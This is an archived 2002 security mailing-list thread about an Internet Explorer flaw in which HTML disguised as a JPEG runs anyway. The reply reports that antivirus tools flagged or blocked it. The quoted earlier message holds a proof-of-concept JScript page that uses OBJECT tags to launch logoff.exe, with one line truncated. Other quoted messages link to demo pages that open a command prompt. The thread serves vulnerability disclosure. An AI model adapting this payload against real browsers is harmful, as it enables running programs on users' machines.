Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this)

From: David Barnett (dbarn064at_private)
Date: Sat Mar 16 2002 - 06:57:47 PST

Next message: Felipe Franciosi: "Re: [Re: Rather large MSIE-hole] another variant"

Previous message: Benjamin P. Grubin: "RE: Firewall and IDS, (the second way)."
In reply to: NoCoNFLiC: "FW: [Re: Rather large MSIE-hole] another variant"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I am running Win 2k sp2 MSIE 5.5 and MSIE 6.0 both current patches. I also
have Norton AV and Finjan  SurfinGuard Pro running, both of which caught the
"exploit" and prompted me for further action. NAV alerted me to the exploit
but let it still run, Finjan out right blocked it from running.

----- Original Message -----
From: "NoCoNFLiC" <noconat_private>
To: "Magnus Bodin" <magnusat_private>
Cc: <vuln-devat_private>
Sent: Friday, March 15, 2002 5:49 PM
Subject: FW: [Re: Rather large MSIE-hole] another variant


> [magnusat_private] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:
> >
> > The latest MSIE-hole is now spreading.
> >
> > THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
> > Content-Type if it "thinks" it knows better, then the code is executed.
> > This in combination with the malicious code that is possible to run,
then
> > an "innocent.jpg" with the following content will log off an XP-user.
> >
> > --%< cut here-----
> > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> > <HTML>
> > <HEAD>
> > <TITLE>IE6 security...</TITLE>
> >
> > <META http-equiv=Content-Type content="text/html; charset=windows-1252">
> > <SCRIPT language=JScript>
> >
> > var programName=new Array(
> >     'c:/windows/system32/logoff.exe',
> >     'c:/winxp/system32/logoff.exe',
> >     'c:/winnt/system32/logoff.exe'
> > );
> >
> > function Init(){
> >     var oPopup=window.createPopup();
> >     var oPopBody=oPopup.document.body;
> >     var n,html='';
> >     for(n=0;n<programName.length;n++)
> >         html+="<OBJECT NAME='X'
> > CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
> >     oPopBody.innerHTML=html;
> >     oPopup.show(290, 390, 200, 200, document.body);
> > }
> >
> > </SCRIPT>
> > </head>
> > <BODY onload="Init()">
> > You should feel lucky if you dont have XP right now.
> > </BODY>
> > </HTML>
> > --%< cut here-----
> >
> >
> > --
> > magnus                               MICROS~1 BOB was written in Lisp.
> >             http://x42.com/
>
>
>    Just passing this along, as some may not be on the sec-basics list.
>
> -----Original Message-----
> From: Sprissler, Noah [mailto:NSPRISSLERat_private]
> Sent: March 12, 2002 10:31
> To: security-basics@security-focus.com
> Subject: RE: scary site
>
> That's interesting.  I have disabled active scripting as most have
suggested
> and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS
> prompt.  However, if I goto this link from Greymagic
> http://security.greymagic.com/adv/gm001-ie/simplebind.html their
> implementation of this works fine no matter what settings I disable.
Win2k
> with all patches, IE6 with all patches.
>
> -Noah
>
> -----Original Message-----
>
> --
>
> - nocon
>
> ======================================
>
> noconat_private
> http://nocon.darkflame.net
>
> ======================================
>

Next message: Felipe Franciosi: "Re: [Re: Rather large MSIE-hole] another variant"
Previous message: Benjamin P. Grubin: "RE: Firewall and IDS, (the second way)."
In reply to: NoCoNFLiC: "FW: [Re: Rather large MSIE-hole] another variant"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Mar 17 2002 - 00:05:44 PST